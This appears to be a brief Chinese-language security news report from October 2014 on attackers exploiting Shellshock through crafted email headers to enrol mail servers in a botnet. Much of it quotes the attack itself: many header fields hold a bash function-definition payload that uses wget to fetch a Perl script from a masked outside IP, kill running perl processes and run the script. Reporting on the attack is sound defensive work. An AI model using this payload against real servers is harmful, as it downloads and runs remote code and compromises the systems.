來了！攻擊者利用Shellshock漏洞入侵郵件伺服器來了！攻擊者利用Shellshock漏洞入侵郵件伺服器

安全研究人員報告，攻擊者向郵件伺服器發送特定的消息頭字段，誘騙伺服器執行一個 perl腳本，成為僵屍網絡的一部分。郵件消息頭的構成是：

shellshock spam october 2014 （ip位址已隐藏）

===

to:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

references:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

cc:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

from:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

subject:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

date:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

message-id:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

comments:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

keywords:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

resent-date:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

resent-from:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

resent-sender:() { :; };wget -o /tmp/.legend http://xxx.xx.xxx.xx/legend.txt;killall -9 perl;perl /tmp/.legend

原文釋出時間：2014-10-29

本文來自雲栖合作夥伴“linux中國”